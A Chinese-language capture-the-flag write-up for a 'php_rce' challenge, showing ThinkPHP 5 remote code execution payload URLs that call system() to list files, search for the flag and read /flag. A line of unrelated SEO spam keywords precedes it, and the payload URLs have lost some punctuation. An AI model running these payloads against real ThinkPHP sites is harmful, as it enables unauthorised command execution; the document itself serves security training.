个人网站推广app,施工员证怎么查询网站,中国企业网银怎么登录,潍坊网站seo外包背景知识 Linux命令 thinkPHPv5漏洞
题目 打开页面#xff0c;页面显示为thinkphp v5的界面#xff0c;可以判断框架为thinkPHP#xff0c;可以去网上查找相关的漏洞
由题目可知#xff0c;php rec是一个通过远程代码执行漏洞来攻击php程序的一种方式
因为不知道是php版…背景知识 Linux命令 thinkPHPv5漏洞
题目 打开页面页面显示为thinkphp v5的界面可以判断框架为thinkPHP可以去网上查找相关的漏洞
由题目可知php rec是一个通过远程代码执行漏洞来攻击php程序的一种方式
因为不知道是php版本几先尝试一下
使用thinkPHP 5.1的漏洞
payload /?sindex/\think\Container/invokefunctionfunctioncall_user_func_arrayvars[0]systemvars[1][]ls 提示为5.0.2版本
payload
/?sindex/\think\app/invokefunctionfunctioncall_user_func_arrayvars[0]systemvars[1][]ls 说明命令执行成功
接着抓取flag
payload
/?sindex/\think\app/invokefunctionfunctioncall_user_func_arrayvars[0]systemvars[1][]find / -name flag 由页面提示可知flag储存在flag文件下的flag文件中
用cat命令读取flag
payload
/?sindex/\think\app/invokefunctionfunctioncall_user_func_arrayvars[0]systemvars[1][]cat /flag 得到flag 参考学习链接
攻防世界-web篇(php_rce)详解_渗透小剑客的博客-CSDN博客
https://www.cnblogs.com/qiushuo/p/17454519.html
